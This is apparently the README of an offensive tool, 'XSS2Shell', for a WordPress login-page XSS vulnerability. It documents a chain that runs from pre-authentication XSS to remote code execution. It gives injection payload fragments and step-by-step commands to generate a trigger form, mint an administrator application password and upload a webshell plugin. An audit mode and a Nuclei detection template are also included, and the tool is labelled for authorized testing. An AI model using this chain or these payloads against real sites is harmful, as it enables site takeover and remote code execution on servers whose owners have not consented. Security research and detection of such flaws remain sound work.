CVE-2026-64638 · Reflected XSS on wp-login.php · CVSS 8.9 (v4.0) · Patched in WordPress 7.0.3
⚠️ AUTHORIZED TESTING ONLY. This tool is for security research and authorized penetration testing against systems you own or have explicit written permission to test. Unauthorized use is illegal in most jurisdictions. The researcher (PWN.AI) disclosed this on 2026-08-07; WordPress shipped the fix in 7.0.3 the same day.
Overview
XSS2Shell is a pre-authentication XSS to code-execution chain affecting WordPress Core (all versions back to 4.7, ~500M+ sites). A single crafted failed-login attempt runs attacker JavaScript in the WordPress origin; against a logged-in administrator it escalates to full RCE.
Public disclosure: https://pwn.ai/blog/xss2shell
The Chain (5 stages)
- Parser differential —
wp-login.phpreflects the submitted username viasprintf('<strong>Error:</strong> The username <strong>%s</strong> ...').< area id=test>(whitespace between<and tag name) survives PHPstrip_tags(), then WordPress's KSES sanitizer re-parses it into a live DOM element. - DOM injection — injected elements on the login page:
< area id=ajaxurl href=...>,< div id=color-picker class=reset-pass-submit>,< button class="wp-generate-pw color-option">X. - Autonomous request —
wp-pass.php's delegated click handler fires via the injected button. The guarduser_id === new_user_idis bypassed (undefined === undefined— both inputs absent on the login page). The identifierajaxurlresolves to the injected<area>via HTML named property access on the Window object. - Same-origin POST — jQuery POSTs to the attacker-controlled
href(/?rest_route=/&_method=GET&_jsonp=alert&_envelope=1— JSONP envelope). - RCE (admin victim) — OAuth app-password flow → REST API page creation →
plugin upload → webshell (PHP in
wp-content/plugins/<slug>/is web-accessible without activation).
Usage
# 1. Non-destructive check — does the target reflect the payload?
python3 xss2shell.py check https://example.com
# 2. 🛡️ DEFENSIVE AUDIT — WordPress hardening report (A-F score)
python3 xss2shell.py audit https://example.com
# Checks: core version vs XSS2Shell/wp2shell, XSS reflection,
# sensitive file exposure (wp-config.bak, .git, debug.log, xmlrpc),
# security headers (CSP/HSTS/XFO), REST user enumeration.
# 3. Generate the trigger HTML form (XSS stage)
python3 xss2shell.py exploit --target example.com > trigger.html
# 4. RCE stage (lab only — needs admin application password)
python3 xss2shell.py shell https://example.com --app-password "XXXX XXXX XXXX XXXX XXXX XXXX"
# 5. Emit the plugin zip without uploading
python3 xss2shell.py zip --out xss2shell-plugin.zip
Requires: Python 3.8+ stdlib only — no third-party dependencies.
Audit example
$ python3 xss2shell.py audit https://target.example
🛡️ WORDPRESS GÜVENLİK DENETİMİ (savunma modu)
🔴 [CRITICAL] WordPress 6.9.4 — CVE-2026-64638 (XSS2Shell) SAVUNMASIZ, 7.0.3+ gerekli
🔴 [CRITICAL] wp-login.php XSS yansıması VAR — CVE-2026-64638 aktif, acil güncelle!
🟠 [HIGH] Sızıntı: /xmlrpc.php HTTP 405
🟡 [WARN] Header X-Frame-Options eksik — clickjacking koruması önerilir
...
📊 GÜVENLİK SKORU: F (91 puan risk) — Ciddi risk — hemen önlem al!
Attack flow (manual lab walkthrough)
- Serve
trigger.html, submit it (or auto-submit via JS) against the target login page → XSS fires in the victim's browser. - With an admin victim:
authorize-application.phpis abused to mint an application password. - Use the app password with
shellto upload the plugin zip. - Access
/wp-content/plugins/xss2shell/xss2shell.php—{"rce":true,...}.
Detections / References
- PWN.AI disclosure: https://pwn.ai/blog/xss2shell
- THN coverage: https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
- NHS cyber alert: https://digital.nhs.uk/cyber-alerts/2026/cc-4827
- SocRadar: https://socradar.io/blog/xss2shell-cve-2026-64638-wordpress/
Nuclei Template
A ready-to-use Nuclei template is included: nuclei-CVE-2026-64638.yaml
# Scan a single target
nuclei -t nuclei-CVE-2026-64638.yaml -u https://example.com
# Scan a list of targets
nuclei -t nuclei-CVE-2026-64638.yaml -l targets.txt
The template detects the parser differential (reflected < area element on
wp-login.php) with two payload variants and is verified against both
vulnerable (6.9.4) and patched (7.0.3+) installations.
Note: a functionally identical template was merged upstream into nuclei-templates via PR #16785 — this copy is maintained here for standalone use.
Comments